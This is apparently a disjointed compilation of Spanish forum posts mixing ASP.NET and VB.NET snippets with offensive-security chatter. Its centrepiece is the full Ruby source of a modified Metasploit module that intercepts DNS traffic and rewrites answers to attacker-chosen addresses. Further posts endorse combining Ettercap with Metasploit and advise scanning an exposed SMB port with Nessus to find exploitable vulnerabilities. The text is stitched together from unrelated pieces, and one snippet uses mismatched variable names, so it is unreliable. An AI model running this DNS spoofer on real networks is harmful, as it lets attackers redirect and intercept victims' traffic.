WTF!

Bueno, tengo una pregunta, que hace rato me anda rondando en la cabeza. Miren, supongamos que tenemos una consulta así:

SELECT [strIdentificacion], [strNombre], [strApellido]
  FROM [Knowledge].[dbo].[tblUsuario]

Ahora cuales son las posibles opciones para ejecutar y recuperar el resultado de la consulta dentro de Aspx.NET

Opción 1:

strCmd = New SqlCommand(strSql, strcnn)
 
strDr = strCmd.ExecuteReader
If strSqlDataReader.Read Then
   txtIdentificacion.Text = strSqlDataReader("strIdentificacion").ToString()
   txtNombre.Text = strSqlDataReader("strNombre").ToString()
   txtApellido.Text = strSqlDataReader("strApellido").ToString()
End If

Es verdad... tan solo es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado...

Tal vez si los paquetes fuesen "Archivos", se modificarian por algun PAYLOAD

---

PD: fakedns.rb, responde a cualquier consulta DNS con una respuesta falsa apuntando a una dirección IP específica.

##
# $Id: fakedns.rb 5540 2008-06-25 23:04:19Z hdm $
##
 
##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
 
 
require 'msf/core'
require 'resolv'
 
module Msf
 
class Auxiliary::Server::MITM_FakeDNS < Msf::Auxiliary
 
	include Auxiliary::Report
 
	def initialize
		super(
			'Name'        => 'MITM DNS Service',
			'Version'     => '$Revision: 5540 $',
			'Description'    => %q{
			  This hack of the metasploit fakedns.rb serves as a sort 
			  of MITM DNS server.  Requests are passed through to a real
			  DNS server, and the responses are modified before being
			  returned to the client, if they match regular expressions
			  set in FILENAME.
			},
			'Author'      => ['ddz', 'hdm', 'Wesley McGrew <wesley@mcgrewsecurity.com>'],
			'License'     => MSF_LICENSE,
			'Actions'     =>
				[
				 	[ 'Service' ]
				],
			'PassiveActions' => 
				[
					'Service'
				],
			'DefaultAction'  => 'Service'
		)
 
		register_options(
			[
				OptAddress.new('SRVHOST',   [ true, "The local host to listen on.", '0.0.0.0' ]),
				OptPort.new('SRVPORT',      [ true, "The local port to listen on.", 53 ]),
				# W: Added in an option for a set of filters, took out the catchall TARGETHOST
				OptAddress.new('REALDNS', [true,"Ask this server for answers",nil]),
				OptString.new('FILENAME', [true,"File of ip,regex for filtering responses",nil])
			], self.class)
	end
 
 
	def run
 
		begin
		  fp = File.new(datastore['FILENAME'])
		rescue
		  print_status "Could not open #{datastore['FILENAME']} for reading.  Quitting."
	    return
		end
		mod_entries = []
		while !fp.eof?
	    entry = fp.gets().chomp().split(',')
	    mod_entries.push([entry[0],Regexp.new(entry[1])])
	  end
 
 
		@port = datastore['SRVPORT'].to_i
 
    # MacOS X workaround
    ::Socket.do_not_reverse_lookup = true
 
    @sock = ::UDPSocket.new()
    @sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
    @sock.bind(datastore['SRVHOST'], @port)
    @run = true
 
		Thread.new {
		# Wrap in exception handler
		  begin
 
        while @run
          packet, addr = @sock.recvfrom(65535)
          if (packet.length == 0)
              break
          end
 
          request = Resolv::DNS::Message.decode(packet)
 
 
          # W: Go ahead and send it to the real DNS server and
          #    get the response
          sock2 = ::UDPSocket.new()
          sock2.send(packet, 0, datastore['REALDNS'], 53) #datastore['REALDNS'], 53) 
          packet2, addr2 = sock2.recvfrom(65535)
          sock2.close()
 
 
          real_response = Resolv::DNS::Message.decode(packet2)
          fake_response = Resolv::DNS::Message.new()
 
          fake_response.qr = 1 # Recursion desired
          fake_response.ra = 1 # Recursion available
          fake_response.id = real_response.id
 
          real_response.each_question { |name, typeclass|
            fake_response.add_question(name, typeclass)
          }
 
          real_response.each_answer { |name, ttl, data| 
            replaced = false
            mod_entries.each { |e|
              if name.to_s =~ e[1]
                case data.to_s 
                when /IN::A/
                  data = Resolv::DNS::Resource::IN::A.new(e[0])
                  replaced = true
                when /IN::MX/
                  data = Resolv::DNS::Resource::IN::MX.new(10,Resolv::DNS::Name.create(e[0]))
                  replaced = true
                when /IN::NS/
                  data = Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(e[0]))
                  replaced = true
                when /IN::PTR/
                  # Do nothing
                  replaced = true
                else
                  # Do nothing
                  replaced = true
                end
              end
              break if replaced
            }
            fake_response.add_answer(name,ttl,data)
          }
 
          real_response.each_authority { |name, ttl, data|
            mod_entries.each { |e|
              if name.to_s =~ e[1] 
                data = Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(e[0]))
                break
              end
            }
            fake_response.add_authority(name,ttl,data)
          }
 
          response_packet = fake_response.encode()
 
          @sock.send(response_packet, 0, addr[3], addr[1])
        end
 
		# Make sure the socket gets closed on exit
		  rescue ::Exception => e
			  print_error("fakedns: #{e.class} #{e} #{e.backtrace}")
		  ensure
			  @sock.close
		  end
 
		}
 
	end
 
end
end

---

Bueno, xD, ando de nuevo retirado, ocupaciones como "Desarrollador de Software", quitan demasiado tiempo. Así, solo diré...


y... [Ettercap] And [Metasploit], hacen una gran pareja!

Polvo en el Viendo de Kansas

Option Explicit On
Option Strict On
 
Imports System.Text.RegularExpressions
 
Public Class Form1
 
    Private Sub Buscar_Coincidencia( _
        ByVal pattern As String, _
        ByVal RichTextBox As RichTextBox, _
        ByVal cColor As Color, _
        ByVal BackColor As Color)
 
 
        Dim Resultados As MatchCollection
        Dim Palabra As Match
 
        Try
            ' PAsar el pattern e indicar que ignore las mayúsculas y minúsculas al mosmento de buscar
            Dim obj_Expresion As New Regex(pattern.ToString, RegexOptions.IgnoreCase)
 
            ' Ejecutar el método Matches para buscar la cadena en el texto del control
            ' y retornar un MatchCollection con los resultados
            Resultados = obj_Expresion.Matches(RichTextBox.Text)
 
            ' quitar el coloreado anterior
            With RichTextBox
                .SelectAll()
                .SelectionColor = Color.Black
            End With
 
            ' Si se encontraron coincidencias recorre las colección  
            For Each Palabra In Resultados
                With RichTextBox
                    .SelectionStart = Palabra.Index ' comienzo de la selección
                    .SelectionLength = Palabra.Length ' longitud de la cadena a seleccionar
                    .SelectionColor = cColor ' color de la selección
                    .SelectionBackColor = BackColor
                    Debug.Print(Palabra.Value)
                End With
            Next Palabra
 
        Catch ex As Exception
            MsgBox(ex.Message.ToString)
        End Try
 
    End Sub
 
    Private Sub Button1_Click( _
        ByVal sender As System.Object, _
        ByVal e As System.EventArgs) Handles Button1.Click
        ' pasar el pattern, el Richtext, y los colores para el resalte
        Buscar_Coincidencia(TextBox1.Text, RichTextBox1, Color.Blue, Color.Yellow)
 
    End Sub
End Class

Fuente: :http://www.recursosvisualbasic.com.ar/htm/vb-net/9-richtextobx-highlight-color-en-vb-net.htm

FileStream.Lock (Método): Evita que otros procesos cambien FileStream permitiendo al mismo tiempo el acceso de lectura.

---

Fuente: :http://www.canalvisualbasic.net/foro/visual-basic-6-0/bloquear-archivos-para-que-no-puedan-ser-leidos-5204/

Lo dudo alexkof158, ya que estamos refiriendonos a un Ejecutable. Mirad...
En la siguiente cadena, nos referimos a un Archivo Ejecutable

El Nessus dá la referencia de la vulnerabilidad, intentad realizando un Search Nombre_Vulnerabilidad. Y con respecto tu primera duda, mirad que no pudó encontrar el Lenguaje del Sistema.

Mirad http://www.pentester.es/2009/11/por-que-no-consigo-shell-con-mi.html

Que tal neuronass, veo que esta OPEN el microsoft-ds, pero para estár aun más seguros, intentad escanearlo con el Nessus!

---

togueter, WTF!